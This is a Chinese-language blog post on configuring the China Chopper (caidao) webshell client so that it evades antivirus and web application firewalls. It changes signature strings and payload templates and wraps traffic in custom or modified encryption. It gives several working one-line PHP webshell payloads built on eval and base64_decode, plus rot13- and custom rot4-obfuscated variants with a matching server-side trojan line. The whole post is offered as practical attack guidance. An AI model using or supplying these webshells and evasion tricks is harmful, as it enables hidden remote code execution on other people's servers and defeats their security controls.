菜刀配置设置

先参考我的这篇文章菜刀外部可见范围的运行机理,否则有可能看不懂下面内容。

可以这样设置caidao.conf 文件一些参数:

1、改 X@Y`@~   // 防杀软识别,菜刀太有名了,有可能杀软加入了这个字符串的检测呢(还可以是: ~>$)
2、

%s
      # 没什么大用,只是可以这么操作
木马端依然是:

下面介绍,如何改 标签,更容易过 waf:

要想改这个标签,而且菜刀能正常使用需注意以下三点:
1、菜刀是base64加过密的,这个可能是caidao.exe 决定的,所以不可改变,因此菜刀传出的代码必须base64解密,
如类似:base64_decode($_POST[id])    之类
2、目标服务器接收端必须有如:$_POST[mima] 字样 
3、接收端还必须有:eval 等执行PHP代码的命令或函数存在
这里有一个好玩的尝试,可否菜刀端用 get 请求,服务器端也用 get 请求,赞未尝试

方法有对菜刀输出的命令数据流加解密:

1、使用base64再次加解密,或栅栏密码、凯撒密码、仿射密码、维吉尼亚密码等古典密码加解密
2、使用DES、AES等对称分组密码加解密
3、RC4等序列密码加解密
4、RSA等非对称密码加解密
5、可好玩的是组合上述加密算法,自己写加解密算法,没必要写太难的加密算法,只要对2、3、4中
那些现代加密算法的循环次数稍微改变一下就行了,反正只要杀软调用已知解密算法无法识别数据流,那杀软有
什么理由拦截你

加密算法那就研究 应用密码学 这本书吧。

参考链接: 过狗菜刀原理以及绕过魔术引号的配置
中国菜刀20160620初体验


PS:
使用过的 的标签和对应的一句话木马:

1、eval(base64_decode($_POST[id]));&id=%s       // 此行不能少了eval,不知道为什么,如果少了eval 会出现菜刀base64加密后再解密出现乱码的错误。
     
2、eval(base64_decode('%s'));                    // 此行 %s 用单、双引号皆可
                   // 注意,很多时候我会忘了给一句话加 @ ,自己加上就是
3、cmlueShvbmZyNjRfcXJwQnFSKCRfQ0JGR1t2cV0pKTs%%3D&id=%s
(实际上是:对 eval(base64_decOdE($_POST[id]));   str_rot13加密 再 base64编码 > url 编码)
  
4、自己写的简单加密:
izep,fewi:8chigshi,(cTSWX_mha--?&id=%s
(实际上是:对 eval(base64_decode($_POST[id])); 在ascii 码[32,126]之间的字符循环后移4位)
  @eval(str_rot4_decode($_POST['caidao']));      这个是一句话木马代码,其中 str_rot4_decode 是自写解密函数。
# 这个自写解密函数只是个例子,还可以写更复杂的加解密算法。

你可能感兴趣的:(菜刀配置设置)